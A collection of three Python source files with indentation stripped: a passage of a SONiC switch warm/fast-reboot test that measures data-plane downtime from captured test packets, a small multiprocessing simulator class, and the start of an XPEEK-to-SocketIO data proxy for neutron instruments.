def handle_fast_reboot_health_check(self):
self.log("Check that device is still forwarding data plane traffic")
self.fails['dut'].add("Data plane has a forwarding problem after CPU went down")
self.check_alive()
self.fails['dut'].clear()
self.log("Wait until control plane up")
port_up_signal = multiprocessing.Event()
async_cpu_up = self.pool.apply_async(self.wait_until_cpu_port_up, args=(port_up_signal,))
self.log("Wait until data plane stops")
forward_stop_signal = multiprocessing.Event()
async_forward_stop = self.pool.apply_async(self.check_forwarding_stop, args=(forward_stop_signal,))
try:
async_cpu_up.get(timeout=self.task_timeout)
except TimeoutError as e:
port_up_signal.set()
self.log("DUT hasn't bootup in %d seconds" % self.task_timeout)
self.fails['dut'].add("DUT hasn't booted up in %d seconds" % self.task_timeout)
raise
try:
self.no_routing_start, self.upper_replies = async_forward_stop.get(timeout=self.task_timeout)
self.log("Data plane was stopped, Waiting until it's up. Stop time: %s" % str(self.no_routing_start))
except TimeoutError:
forward_stop_signal.set()
self.log("Data plane never stop")
self.routing_always = True
self.upper_replies = [self.nr_vl_pkts]
if self.no_routing_start is not None:
self.no_routing_stop, _ = self.timeout(self.check_forwarding_resume,
self.task_timeout,
"DUT hasn't started to work for %d seconds" % self.task_timeout)
else:
self.no_routing_stop = datetime.datetime.min
self.no_routing_start = datetime.datetime.min
# Stop watching DUT
self.watching = False
def handle_warm_reboot_health_check(self):
self.send_and_sniff()
# Stop watching DUT
self.watching = False
self.log("Stopping reachability state watch thread.")
self.watcher_is_stopped.wait(timeout = 10) # Wait for the Watcher stopped.
self.save_sniffed_packets()
examine_start = datetime.datetime.now()
self.log("Packet flow examine started %s after the reboot" % str(examine_start - self.reboot_start))
self.examine_flow()
self.log("Packet flow examine finished after %s" % str(datetime.datetime.now() - examine_start))
if self.lost_packets:
self.no_routing_stop, self.no_routing_start = datetime.datetime.fromtimestamp(self.no_routing_stop), datetime.datetime.fromtimestamp(self.no_routing_start)
self.log("The longest disruption lasted %.3f seconds. %d packet(s) lost." % (self.max_disrupt_time, self.max_lost_id))
self.log("Total disruptions count is %d. All disruptions lasted %.3f seconds. Total %d packet(s) lost" % \
(self.disrupts_count, self.total_disrupt_time, self.total_disrupt_packets))
else:
self.no_routing_start = self.reboot_start
self.no_routing_stop = self.reboot_start
def handle_post_reboot_health_check(self):
# wait until all bgp session are established
self.log("Wait until bgp routing is up on all devices")
for _, q in self.ssh_jobs:
q.put('quit')
def wait_for_ssh_threads(signal):
while any(thr.is_alive() for thr, _ in self.ssh_jobs) and not signal.is_set():
self.log('Waiting till SSH threads stop')
time.sleep(self.TIMEOUT)
for thr, _ in self.ssh_jobs:
thr.join()
self.timeout(wait_for_ssh_threads, self.task_timeout, "SSH threads haven't finished for %d seconds" % self.task_timeout)
self.log("Data plane works again. Start time: %s" % str(self.no_routing_stop))
self.log("")
if self.no_routing_stop - self.no_routing_start > self.limit:
self.fails['dut'].add("Longest downtime period must be less then %s seconds. It was %s" \
% (self.test_params['reboot_limit_in_seconds'], str(self.no_routing_stop - self.no_routing_start)))
if self.no_routing_stop - self.reboot_start > datetime.timedelta(seconds=self.test_params['graceful_limit']):
self.fails['dut'].add("%s cycle must be less than graceful limit %s seconds" % (self.reboot_type, self.test_params['graceful_limit']))
if 'warm-reboot' in self.reboot_type:
if self.total_disrupt_time > self.limit.total_seconds():
self.fails['dut'].add("Total downtime period must be less then %s seconds. It was %s" \
% (str(self.limit), str(self.total_disrupt_time)))
# after the data plane is up, check for routing changes
if self.test_params['inboot_oper'] and self.sad_handle:
self.check_inboot_sad_status()
# postboot check for all preboot operations
if self.test_params['preboot_oper'] and self.sad_handle:
self.check_postboot_sad_status()
else:
# verify there are no interface flaps after warm boot
self.neigh_lag_status_check()
if self.reboot_type == 'fast-reboot':
self.no_cp_replies = self.extract_no_cpu_replies(self.upper_replies)
if self.no_cp_replies < 0.95 * self.nr_vl_pkts:
self.fails['dut'].add("Dataplane didn't route to all servers, when control-plane was down: %d vs %d" % (self.no_cp_replies, self.nr_vl_pkts))
def handle_advanced_reboot_health_check_kvm(self):
self.log("Wait until data plane stops")
forward_stop_signal = multiprocessing.Event()
async_forward_stop = self.pool.apply_async(self.check_forwarding_stop, args=(forward_stop_signal,))
self.log("Wait until control plane up")
port_up_signal = multiprocessing.Event()
async_cpu_up = self.pool.apply_async(self.wait_until_cpu_port_up, args=(port_up_signal,))
try:
self.no_routing_start, _ = async_forward_stop.get(timeout=self.task_timeout)
self.log("Data plane was stopped, Waiting until it's up. Stop time: %s" % str(self.no_routing_start))
except TimeoutError:
forward_stop_signal.set()
self.log("Data plane never stop")
try:
async_cpu_up.get(timeout=self.task_timeout)
no_control_stop = self.cpu_state.get_state_time('up')
self.log("Control plane down stops %s" % str(no_control_stop))
except TimeoutError as e:
port_up_signal.set()
self.log("DUT hasn't bootup in %d seconds" % self.task_timeout)
self.fails['dut'].add("DUT hasn't booted up in %d seconds" % self.task_timeout)
raise
# Wait until data plane up if it stopped
if self.no_routing_start is not None:
self.no_routing_stop, _ = self.timeout(self.check_forwarding_resume,
self.task_timeout,
"DUT hasn't started to work for %d seconds" % self.task_timeout)
else:
self.no_routing_stop = datetime.datetime.min
self.no_routing_start = datetime.datetime.min
# Stop watching DUT
self.watching = False
def handle_post_reboot_health_check_kvm(self):
# wait until all bgp session are established
self.log("Wait until bgp routing is up on all devices")
for _, q in self.ssh_jobs:
q.put('quit')
def wait_for_ssh_threads(signal):
while any(thr.is_alive() for thr, _ in self.ssh_jobs) and not signal.is_set():
time.sleep(self.TIMEOUT)
for thr, _ in self.ssh_jobs:
thr.join()
self.timeout(wait_for_ssh_threads, self.task_timeout, "SSH threads haven't finished for %d seconds" % self.task_timeout)
self.log("Data plane works again. Start time: %s" % str(self.no_routing_stop))
self.log("")
if self.no_routing_stop - self.no_routing_start > self.limit:
self.fails['dut'].add("Longest downtime period must be less then %s seconds. It was %s" \
% (self.test_params['reboot_limit_in_seconds'], str(self.no_routing_stop - self.no_routing_start)))
if self.no_routing_stop - self.reboot_start > datetime.timedelta(seconds=self.test_params['graceful_limit']):
self.fails['dut'].add("%s cycle must be less than graceful limit %s seconds" % (self.reboot_type, self.test_params['graceful_limit']))
def handle_post_reboot_test_reports(self):
# Stop watching DUT
self.watching = False
# revert to pretest state
if self.sad_oper and self.sad_handle:
self.sad_revert()
if self.test_params['inboot_oper']:
self.check_postboot_sad_status()
self.log(" ")
# Generating report
self.log("="*50)
self.log("Report:")
self.log("="*50)
self.log("LACP/BGP were down for (extracted from cli):")
self.log("-"*50)
for ip in sorted(self.cli_info.keys()):
self.log(" %s - lacp: %7.3f (%d) po_events: (%d) bgp v4: %7.3f (%d) bgp v6: %7.3f (%d)" \
% (ip, self.cli_info[ip]['lacp'][1], self.cli_info[ip]['lacp'][0], \
self.cli_info[ip]['po'][1], \
self.cli_info[ip]['bgp_v4'][1], self.cli_info[ip]['bgp_v4'][0],\
self.cli_info[ip]['bgp_v6'][1], self.cli_info[ip]['bgp_v6'][0]))
self.log("-"*50)
self.log("Extracted from VM logs:")
self.log("-"*50)
for ip in sorted(self.logs_info.keys()):
self.log("Extracted log info from %s" % ip)
for msg in sorted(self.logs_info[ip].keys()):
if not msg in [ 'error', 'route_timeout' ]:
self.log(" %s : %d" % (msg, self.logs_info[ip][msg]))
else:
self.log(" %s" % self.logs_info[ip][msg])
self.log("-"*50)
self.log("Summary:")
self.log("-"*50)
if self.no_routing_stop:
self.log("Longest downtime period was %s" % str(self.no_routing_stop - self.no_routing_start))
reboot_time = "0:00:00" if self.routing_always else str(self.no_routing_stop - self.reboot_start)
self.log("Reboot time was %s" % reboot_time)
self.log("Expected downtime is less then %s" % self.limit)
if self.reboot_type == 'fast-reboot' and self.no_cp_replies:
self.log("How many packets were received back when control plane was down: %d Expected: %d" % (self.no_cp_replies, self.nr_vl_pkts))
has_info = any(len(info) > 0 for info in self.info.values())
if has_info:
self.log("-"*50)
self.log("Additional info:")
self.log("-"*50)
for name, info in self.info.items():
for entry in info:
self.log("INFO:%s:%s" % (name, entry))
self.log("-"*50)
is_good = all(len(fails) == 0 for fails in self.fails.values())
errors = ""
if not is_good:
self.log("-"*50)
self.log("Fails:")
self.log("-"*50)
errors = "\n\nSomething went wrong. Please check output below:\n\n"
for name, fails in self.fails.items():
for fail in fails:
self.log("FAILED:%s:%s" % (name, fail))
errors += "FAILED:%s:%s\n" % (name, fail)
self.log("="*50)
self.report = {
"downtime": (self.no_routing_stop - self.no_routing_start).total_seconds(),
"reboot_time": "0:00:00" if self.no_routing_stop and self.routing_always \
else (self.no_routing_stop - self.reboot_start).total_seconds()
}
with open(self.report_file_name, 'w') as reportfile:
json.dump(self.report, reportfile)
self.assertTrue(is_good, errors)
def runTest(self):
self.pre_reboot_test_setup()
try:
self.log("Check that device is alive and pinging")
self.fails['dut'].add("DUT is not ready for test")
self.wait_dut_to_warm_up()
self.fails['dut'].clear()
self.log("Schedule to reboot the remote switch in %s sec" % self.reboot_delay)
thr = threading.Thread(target=self.reboot_dut)
thr.setDaemon(True)
thr.start()
if 'warm-reboot' in self.reboot_type:
thr = threading.Thread(target=self.check_warmboot_finalizer)
thr.setDaemon(True)
thr.start()
self.wait_until_reboot()
if self.kvm_test:
self.handle_advanced_reboot_health_check_kvm()
self.handle_post_reboot_health_check_kvm()
else:
if self.reboot_type == 'fast-reboot':
self.handle_fast_reboot_health_check()
if 'warm-reboot' in self.reboot_type:
self.handle_warm_reboot_health_check()
self.handle_post_reboot_health_check()
# Check sonic version after reboot
self.check_sonic_version_after_reboot()
except Exception as e:
self.fails['dut'].add(e)
finally:
self.handle_post_reboot_test_reports()
def neigh_lag_status_check(self):
"""
Ensure there are no interface flaps after warm-boot
"""
for neigh in self.ssh_targets:
self.neigh_handle = Arista(neigh, None, self.test_params)
self.neigh_handle.connect()
fails, flap_cnt = self.neigh_handle.verify_neigh_lag_no_flap()
self.neigh_handle.disconnect()
self.fails[neigh] |= fails
if not flap_cnt:
self.log("No LAG flaps seen on %s after warm boot" % neigh)
else:
self.fails[neigh].add("LAG flapped %s times on %s after warm boot" % (flap_cnt, neigh))
def check_sonic_version_after_reboot(self):
# Check sonic version after reboot
target_version = self.test_params['target_version']
if target_version:
stdout, stderr, return_code = self.dut_connection.execCommand("sudo sonic_installer list | grep Current | awk '{print $2}'")
current_version = ""
if stdout != []:
current_version = str(stdout[0]).replace('\n', '')
self.log("Current={} Target={}".format(current_version, target_version))
if current_version != target_version:
raise Exception("Sonic upgrade failed. Target={} Current={}".format(\
target_version, current_version))
def extract_no_cpu_replies(self, arr):
"""
This function tries to extract number of replies from dataplane, when control plane is non working
"""
# remove all tail zero values
non_zero = filter(lambda x : x > 0, arr)
# check that last value is different from previos
if len(non_zero) > 1 and non_zero[-1] < non_zero[-2]:
return non_zero[-2]
else:
return non_zero[-1]
def reboot_dut(self):
time.sleep(self.reboot_delay)
self.log("Rebooting remote side")
stdout, stderr, return_code = self.dut_connection.execCommand("sudo " + self.reboot_type, timeout=30)
if stdout != []:
self.log("stdout from %s: %s" % (self.reboot_type, str(stdout)))
if stderr != []:
self.log("stderr from %s: %s" % (self.reboot_type, str(stderr)))
self.fails['dut'].add("{} failed with error {}".format(self.reboot_type, stderr))
thread.interrupt_main()
raise Exception("{} failed with error {}".format(self.reboot_type, stderr))
self.log("return code from %s: %s" % (self.reboot_type, str(return_code)))
# Note: a timeout reboot in ssh session will return a 255 code
if return_code not in [0, 255]:
thread.interrupt_main()
return
def cmd(self, cmds):
process = subprocess.Popen(cmds,
shell=False,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
return_code = process.returncode
return stdout, stderr, return_code
def peer_state_check(self, ip, queue):
self.log('SSH thread for VM {} started'.format(ip))
ssh = Arista(ip, queue, self.test_params, log_cb=self.log)
self.fails[ip], self.info[ip], self.cli_info[ip], self.logs_info[ip] = ssh.run()
self.log('SSH thread for VM {} finished'.format(ip))
def wait_until_cpu_port_down(self, signal):
while not signal.is_set():
for _, q in self.ssh_jobs:
self.put_nowait(q, 'cpu_down')
if self.cpu_state.get() == 'down':
break
time.sleep(self.TIMEOUT)
def wait_until_cpu_port_up(self, signal):
while not signal.is_set():
for _, q in self.ssh_jobs:
self.put_nowait(q, 'cpu_up')
if self.cpu_state.get() == 'up':
break
time.sleep(self.TIMEOUT)
def apply_filter_all_ports(self, filter_expression):
for p in self.dataplane.ports.values():
port = p.get_packet_source()
scapyall.attach_filter(port.socket, filter_expression)
def send_in_background(self, packets_list = None, interval = None):
"""
This method sends predefined list of packets with predefined interval.
"""
if not interval:
interval = self.send_interval
if not packets_list:
packets_list = self.packets_list
self.sniffer_started.wait(timeout=10)
with self.dataplane_io_lock:
# While running fast data plane sender thread there are two reasons for filter to be applied
# 1. filter out data plane traffic which is tcp to free up the load on PTF socket (sniffer thread is using a different one)
# 2. during warm neighbor restoration DUT will send a lot of ARP requests which we are not interested in
# This is essential to get stable results
self.apply_filter_all_ports('not (arp and ether src {}) and not tcp'.format(self.test_params['dut_mac']))
sender_start = datetime.datetime.now()
self.log("Sender started at %s" % str(sender_start))
for entry in packets_list:
time.sleep(interval)
if self.vnet:
testutils.send_packet(self, entry[0], entry[1].decode("base64"))
else:
testutils.send_packet(self, *entry)
self.log("Sender has been running for %s" % str(datetime.datetime.now() - sender_start))
# Remove filter
self.apply_filter_all_ports('')
def sniff_in_background(self, wait = None):
"""
This function listens on all ports, in both directions, for the TCP src=1234 dst=5000 packets, until timeout.
Once found, all packets are dumped to local pcap file,
and all packets are saved to self.packets as scapy type.
The native scapy.snif() is used as a background thread, to allow delayed start for the send_in_background().
"""
if not wait:
wait = self.time_to_listen + self.test_params['sniff_time_incr']
sniffer_start = datetime.datetime.now()
self.log("Sniffer started at %s" % str(sniffer_start))
sniff_filter = "tcp and tcp dst port 5000 and tcp src port 1234 and not icmp"
scapy_sniffer = threading.Thread(target=self.scapy_sniff, kwargs={'wait': wait, 'sniff_filter': sniff_filter})
scapy_sniffer.start()
time.sleep(2) # Let the scapy sniff initialize completely.
self.sniffer_started.set() # Unblock waiter for the send_in_background.
scapy_sniffer.join()
self.log("Sniffer has been running for %s" % str(datetime.datetime.now() - sniffer_start))
self.sniffer_started.clear()
def save_sniffed_packets(self):
filename = "/tmp/capture_%s.pcap" % self.sad_oper if self.sad_oper is not None else "/tmp/capture.pcap"
if self.packets:
scapyall.wrpcap(filename, self.packets)
self.log("Pcap file dumped to %s" % filename)
else:
self.log("Pcap file is empty.")
def scapy_sniff(self, wait = 180, sniff_filter = ''):
"""
This method exploits native scapy sniff() method.
"""
self.packets = scapyall.sniff(timeout = wait, filter = sniff_filter)
def send_and_sniff(self):
"""
This method starts two background threads in parallel:
one for sending, another for collecting the sent packets.
"""
self.sender_thr = threading.Thread(target = self.send_in_background)
self.sniff_thr = threading.Thread(target = self.sniff_in_background)
self.sniffer_started = threading.Event() # Event for the sniff_in_background status.
self.sniff_thr.start()
self.sender_thr.start()
self.sniff_thr.join()
self.sender_thr.join()
def check_tcp_payload(self, packet):
"""
This method is used by examine_flow() method.
It returns True if a packet is not corrupted and has a valid TCP sequential TCP Payload, as created by generate_bidirectional() method'.
"""
try:
int(str(packet[scapyall.TCP].payload)) in range(self.packets_to_send)
return True
except Exception as err:
return False
def no_flood(self, packet):
"""
This method filters packets which are unique (i.e. no floods).
"""
if (not int(str(packet[scapyall.TCP].payload)) in self.unique_id) and (packet[scapyall.Ether].src == self.dut_mac):
# This is a unique (no flooded) received packet.
self.unique_id.append(int(str(packet[scapyall.TCP].payload)))
return True
elif packet[scapyall.Ether].dst == self.dut_mac:
# This is a sent packet.
return True
else:
return False
def examine_flow(self, filename = None):
"""
This method examines pcap file (if given), or self.packets scapy file.
The method compares TCP payloads of the packets one by one (assuming all payloads are consecutive integers),
and the losses if found - are treated as disruptions in Dataplane forwarding.
All disruptions are saved to self.lost_packets dictionary, in format:
disrupt_start_id = (missing_packets_count, disrupt_time, disrupt_start_timestamp, disrupt_stop_timestamp)
"""
if filename:
all_packets = scapyall.rdpcap(filename)
elif self.packets:
all_packets = self.packets
else:
self.log("Filename and self.packets are not defined.")
self.fails['dut'].add("Filename and self.packets are not defined")
return None
# Filter out packets and remove floods:
self.unique_id = list() # This list will contain all unique Payload ID, to filter out received floods.
filtered_packets = [ pkt for pkt in all_packets if
scapyall.TCP in pkt and
not scapyall.ICMP in pkt and
pkt[scapyall.TCP].sport == 1234 and
pkt[scapyall.TCP].dport == 5000 and
self.check_tcp_payload(pkt) and
self.no_flood(pkt)
]
if self.vnet:
decap_packets = [ scapyall.Ether(str(pkt.payload.payload.payload)[8:]) for pkt in all_packets if
scapyall.UDP in pkt and
pkt[scapyall.UDP].sport == 1234
]
filtered_decap_packets = [ pkt for pkt in decap_packets if
scapyall.TCP in pkt and
not scapyall.ICMP in pkt and
pkt[scapyall.TCP].sport == 1234 and
pkt[scapyall.TCP].dport == 5000 and
self.check_tcp_payload(pkt) and
self.no_flood(pkt)
]
filtered_packets = filtered_packets + filtered_decap_packets
# Re-arrange packets, if delayed, by Payload ID and Timestamp:
packets = sorted(filtered_packets, key = lambda packet: (int(str(packet[scapyall.TCP].payload)), packet.time ))
self.lost_packets = dict()
self.max_disrupt, self.total_disruption = 0, 0
sent_packets = dict()
self.fails['dut'].add("Sniffer failed to capture any traffic")
self.assertTrue(packets, "Sniffer failed to capture any traffic")
self.fails['dut'].clear()
if packets:
prev_payload, prev_time = 0, 0
sent_payload = 0
received_counter = 0 # Counts packets from dut.
self.disruption_start, self.disruption_stop = None, None
for packet in packets:
if packet[scapyall.Ether].dst == self.dut_mac:
# This is a sent packet - keep track of it as payload_id:timestamp.
sent_payload = int(str(packet[scapyall.TCP].payload))
sent_packets[sent_payload] = packet.time
continue
if packet[scapyall.Ether].src == self.dut_mac:
# This is a received packet.
received_time = packet.time
received_payload = int(str(packet[scapyall.TCP].payload))
received_counter += 1
if not (received_payload and received_time):
# This is the first valid received packet.
prev_payload = received_payload
prev_time = received_time
continue
if received_payload - prev_payload > 1:
# Packets in a row are missing, a disruption.
lost_id = (received_payload -1) - prev_payload # How many packets lost in a row.
disrupt = (sent_packets[received_payload] - sent_packets[prev_payload + 1]) # How long disrupt lasted.
# Add disrupt to the dict:
self.lost_packets[prev_payload] = (lost_id, disrupt, received_time - disrupt, received_time)
self.log("Disruption between packet ID %d and %d. For %.4f " % (prev_payload, received_payload, disrupt))
if not self.disruption_start:
self.disruption_start = datetime.datetime.fromtimestamp(prev_time)
self.disruption_stop = datetime.datetime.fromtimestamp(received_time)
prev_payload = received_payload
prev_time = received_time
self.fails['dut'].add("Sniffer failed to filter any traffic from DUT")
self.assertTrue(received_counter, "Sniffer failed to filter any traffic from DUT")
self.fails['dut'].clear()
self.disrupts_count = len(self.lost_packets) # Total disrupt counter.
if self.lost_packets:
# Find the longest loss with the longest time:
max_disrupt_from_id, (self.max_lost_id, self.max_disrupt_time, self.no_routing_start, self.no_routing_stop) = \
max(self.lost_packets.items(), key = lambda item:item[1][0:2])
self.total_disrupt_packets = sum([item[0] for item in self.lost_packets.values()])
self.total_disrupt_time = sum([item[1] for item in self.lost_packets.values()])
self.log("Disruptions happen between %s and %s after the reboot." % \
(str(self.disruption_start - self.reboot_start), str(self.disruption_stop - self.reboot_start)))
else:
self.max_lost_id = 0
self.max_disrupt_time = 0
self.total_disrupt_packets = 0
self.total_disrupt_time = 0
self.log("Gaps in forwarding not found.")
self.log("Total incoming packets captured %d" % received_counter)
if packets:
filename = '/tmp/capture_filtered.pcap' if self.sad_oper is None else "/tmp/capture_filtered_%s.pcap" % self.sad_oper
scapyall.wrpcap(filename, packets)
self.log("Filtered pcap dumped to %s" % filename)
def check_forwarding_stop(self, signal):
self.asic_start_recording_vlan_reachability()
while not signal.is_set():
state = self.asic_state.get()
for _, q in self.ssh_jobs:
self.put_nowait(q, 'check_stop')
if state == 'down':
break
time.sleep(self.TIMEOUT)
self.asic_stop_recording_vlan_reachability()
return self.asic_state.get_state_time(state), self.get_asic_vlan_reachability()
def check_forwarding_resume(self, signal):
while not signal.is_set():
state = self.asic_state.get()
if state != 'down':
break
time.sleep(self.TIMEOUT)
return self.asic_state.get_state_time(state), self.get_asic_vlan_reachability()
def ping_data_plane(self, light_probe=True):
self.dataplane.flush()
replies_from_servers = self.pingFromServers()
if replies_from_servers > 0 or not light_probe:
replies_from_upper = self.pingFromUpperTier()
else:
replies_from_upper = 0
return replies_from_servers, replies_from_upper
def wait_dut_to_warm_up(self):
# When the DUT is freshly rebooted, it appears that it needs to warm
# up towards PTF docker. In practice, I've seen this warm up taking
# up to ~70 seconds.
fail = None
dut_stabilize_secs = int(self.test_params['dut_stabilize_secs'])
warm_up_timeout_secs = int(self.test_params['warm_up_timeout_secs'])
start_time = datetime.datetime.now()
up_time = None
# First wait until DUT data/control planes are up
while True:
dataplane = self.asic_state.get()
ctrlplane = self.cpu_state.get()
elapsed = (datetime.datetime.now() - start_time).total_seconds()
if dataplane == 'up' and ctrlplane == 'up':
if not up_time:
up_time = datetime.datetime.now()
up_secs = (datetime.datetime.now() - up_time).total_seconds()
if up_secs > dut_stabilize_secs:
break
else:
# reset up_time
up_time = None
if elapsed > warm_up_timeout_secs:
raise Exception("Control plane didn't come up within warm up timeout")
time.sleep(1)
# check until flooding is over. Flooding happens when FDB entry of
# certain host is not yet learnt by the ASIC, therefore it sends
# packet to all vlan ports.
uptime = datetime.datetime.now()
while True:
elapsed = (datetime.datetime.now() - start_time).total_seconds()
if not self.asic_state.is_flooding() and elapsed > dut_stabilize_secs:
break
if elapsed > warm_up_timeout_secs:
if self.allow_vlan_flooding:
break
raise Exception("Data plane didn't stop flooding within warm up timeout")
time.sleep(1)
dataplane = self.asic_state.get()
ctrlplane = self.cpu_state.get()
if not dataplane == 'up':
fail = "Data plane"
elif not ctrlplane == 'up':
fail = "Control plane"
if fail is not None:
raise Exception("{} went down while waiting for flooding to stop".format(fail))
if self.asic_state.get_state_time('up') > uptime:
fail = "Data plane"
elif self.cpu_state.get_state_time('up') > uptime:
fail = "Control plane"
if fail is not None:
raise Exception("{} flapped while waiting for the warm up".format(fail))
# Everything is good
def check_alive(self):
# This function checks that DUT routes the packets in the both directions.
#
# Sometimes first attempt failes because ARP responses to DUT are not so fast.
# But after this the function expects to see steady "replies".
# If the function sees that there is an issue with the dataplane after we saw
# successful replies it considers that the DUT is not healthy
#
# Sometimes I see that DUT returns more replies then requests.
# I think this is because of not populated FDB table
# The function waits while it's done
uptime = None
for counter in range(self.nr_tests * 2):
state = self.asic_state.get()
if state == 'up':
if not uptime:
uptime = self.asic_state.get_state_time(state)
else:
if uptime:
raise Exception("Data plane stopped working")
time.sleep(2)
# wait, until FDB entries are populated
for _ in range(self.nr_tests * 10): # wait for some time
if self.asic_state.is_flooding():
time.sleep(2)
else:
break
else:
raise Exception("DUT is flooding")
def get_asic_vlan_reachability(self):
return self.asic_vlan_reach
def asic_start_recording_vlan_reachability(self):
with self.vlan_lock:
self.asic_vlan_reach = []
self.recording = True
def asic_stop_recording_vlan_reachability(self):
with self.vlan_lock:
self.recording = False
def try_record_asic_vlan_recachability(self, t1_to_vlan):
with self.vlan_lock:
if self.recording:
self.asic_vlan_reach.append(t1_to_vlan)
def log_asic_state_change(self, reachable, partial=False, t1_to_vlan=0, flooding=False):
old = self.asic_state.get()
if reachable:
state = 'up' if not partial else 'partial'
else:
state = 'down'
self.try_record_asic_vlan_recachability(t1_to_vlan)
self.asic_state.set_flooding(flooding)
if old != state:
self.log("Data plane state transition from %s to %s (%d)" % (old, state, t1_to_vlan))
self.asic_state.set(state)
def log_cpu_state_change(self, reachable, partial=False, flooding=False):
old = self.cpu_state.get()
if reachable:
state = 'up' if not partial else 'partial'
else:
state = 'down'
self.cpu_state.set_flooding(flooding)
if old != state:
self.log("Control plane state transition from %s to %s" % (old, state))
self.cpu_state.set(state)
def log_vlan_state_change(self, reachable):
old = self.vlan_state.get()
if reachable:
state = 'up'
else:
state = 'down'
if old != state:
self.log("VLAN ARP state transition from %s to %s" % (old, state))
self.vlan_state.set(state)
def reachability_watcher(self):
# This function watches the reachability of the CPU port, and ASIC. It logs the state
# changes for future analysis
self.watcher_is_stopped.clear() # Watcher is running.
while self.watching:
if self.dataplane_io_lock.acquire(False):
vlan_to_t1, t1_to_vlan = self.ping_data_plane(self.light_probe)
reachable = (t1_to_vlan > self.nr_vl_pkts * 0.7 and
vlan_to_t1 > self.nr_pc_pkts * 0.7)
partial = (reachable and
(t1_to_vlan < self.nr_vl_pkts or
vlan_to_t1 < self.nr_pc_pkts))
flooding = (reachable and
(t1_to_vlan > self.nr_vl_pkts or
vlan_to_t1 > self.nr_pc_pkts))
self.log_asic_state_change(reachable, partial, t1_to_vlan, flooding)
self.dataplane_io_lock.release()
total_rcv_pkt_cnt = self.pingDut()
reachable = total_rcv_pkt_cnt > 0 and total_rcv_pkt_cnt > self.ping_dut_pkts * 0.7
partial = total_rcv_pkt_cnt > 0 and total_rcv_pkt_cnt < self.ping_dut_pkts
flooding = reachable and total_rcv_pkt_cnt > self.ping_dut_pkts
self.log_cpu_state_change(reachable, partial, flooding)
total_rcv_pkt_cnt = self.arpPing()
reachable = total_rcv_pkt_cnt >= self.arp_ping_pkts
self.log_vlan_state_change(reachable)
self.watcher_is_running.set() # Watcher is running.
self.watcher_is_stopped.set() # Watcher has stopped.
self.watcher_is_running.clear() # Watcher has stopped.
def pingFromServers(self):
for i in xrange(self.nr_pc_pkts):
testutils.send_packet(self, self.from_server_src_port, self.from_vlan_packet)
total_rcv_pkt_cnt = testutils.count_matched_packets_all_ports(self, self.from_vlan_exp_packet, self.from_server_dst_ports, timeout=self.PKT_TOUT)
self.log("Send %5d Received %5d servers->t1" % (self.nr_pc_pkts, total_rcv_pkt_cnt), True)
return total_rcv_pkt_cnt
def pingFromUpperTier(self):
for entry in self.from_t1:
testutils.send_packet(self, *entry)
total_rcv_pkt_cnt = testutils.count_matched_packets_all_ports(self, self.from_t1_exp_packet, self.vlan_ports, timeout=self.PKT_TOUT)
self.log("Send %5d Received %5d t1->servers" % (self.nr_vl_pkts, total_rcv_pkt_cnt), True)
return total_rcv_pkt_cnt
def pingDut(self):
for i in xrange(self.ping_dut_pkts):
testutils.send_packet(self, self.random_port(self.vlan_ports), self.ping_dut_packet)
total_rcv_pkt_cnt = testutils.count_matched_packets_all_ports(self, self.ping_dut_exp_packet, self.vlan_ports, timeout=self.PKT_TOUT)
self.log("Send %5d Received %5d ping DUT" % (self.ping_dut_pkts, total_rcv_pkt_cnt), True)
return total_rcv_pkt_cnt
def arpPing(self):
for i in xrange(self.arp_ping_pkts):
testutils.send_packet(self, self.arp_src_port, self.arp_ping)
total_rcv_pkt_cnt = testutils.count_matched_packets_all_ports(self, self.arp_resp, [self.arp_src_port], timeout=self.PKT_TOUT)
self.log("Send %5d Received %5d arp ping" % (self.arp_ping_pkts, total_rcv_pkt_cnt), True)
return total_rcv_pkt_cnt
|
simulator.py
|
from contextlib import contextmanager
import multiprocessing as mp
class Simulator:
def __init__(self, data_generator, pipeline):
self.data_generator = data_generator
self.data_gen_process = mp.Process(target=self.data_generator)
self.pipeline = pipeline
def start(self):
self.pipeline.start()
self.data_gen_process.start()
@contextmanager
def pause(self):
self.pipeline.pause()
self.data_generator.pause()
try:
yield None
finally:
print("Resuming")
self.pipeline.resume()
self.data_generator.resume()
def stop(self):
self.pipeline.stop()
self.data_generator.stop()
for p in self.pipeline.processes:
if p.is_alive():
p.join()
if self.data_gen_process.is_alive():
self.data_gen_process.join()
self.clear_qs()
def get(self):
return self.pipeline.get()
def clear_qs(self):
self.pipeline.clear_qs()
self.data_generator.q_out.queue.clear()
|
xpeek_proxy.py
|
"""
This is an XPEEK listener that forwards messages to the NICE
SocketIO repeater on the data stream
This program requires sioclient and websocket packages to run.
"""
PROXY_PORT = 8001
#import threading
#import types
#import json
#import traceback
import sys
sys.path.append('../server/')
import numpy
import sioclient
import xpeek
import Queue
import signal
#SIO_HOST = '129.6.123.195'
SIO_HOST = 'drneutron.org'
SIO_PORT = 8001 + 2 # publish on port + 2
INSTRUMENT = "CGD"
#INSTRUMENTS = ['BT1','BT4','BT5','BT7','BT8','BT9','CGD','NGD','NG2','NG5','NSE','NG7']
INSTRUMENTS = ['CGD', 'NGD']
#repeater = sioclient.SocketIO(SIO_HOST, SIO_PORT)
#data_channel = repeater.connect('/CGD/data')
#data_channel.emit('data', {"command": "Configure"})
class QueuedDataChannel(sioclient.Channel):
def emit(self, *args, **kw):
self.socket.EmitQueue.put({'args': args, 'kw': kw})
class QueuedSocketIO(sioclient.SocketIO):
def connect(self, channel, handler=None, query=None):
"""
Connect to a channel in the socketIO server.
Returns a connection with emit/send methods for communicating with the
server.
"""
self.channels[channel] = QueuedDataChannel(self, channel, handler)
self.connection.send('1::'+channel+('?'+urlencode(query) if query else ""))
return self.channels[channel]
class KeepAliveSIO(sioclient.SocketIO):
def _send_heartbeat(self):
try:
self.connection.send('2::')
except:
#print 'error sending heartbeat, trying reconnect'
self._connect()
class XPeekToSIO(xpeek.XPeek):
"""
Queue data notifications and plot when the plotting engine
becomes available.
"""
#queue = Queue.Queue()
polarized_ids = ['A', 'B', 'C', 'D']
def __init__(self, instrument, sio_host=SIO_HOST, sio_port=SIO_PORT, debug=True, **kwargs):
xpeek.XPeek.__init__(self, instrument, **kwargs)
self.repeater = KeepAliveSIO(sio_host, sio_port)
self.debug = debug
#self.repeater = sioclient.SocketIO(sio_host, sio_port)
#self.repeater = AutoReconnectSocketIO(sio_host, sio_port)
#self.repeater = repeater
self.data_channel = self.repeater.connect('/%s/data' % (instrument,))
self.previous_lineid = ''
#self.data_channel.emit('data', {"command": "Configure"})
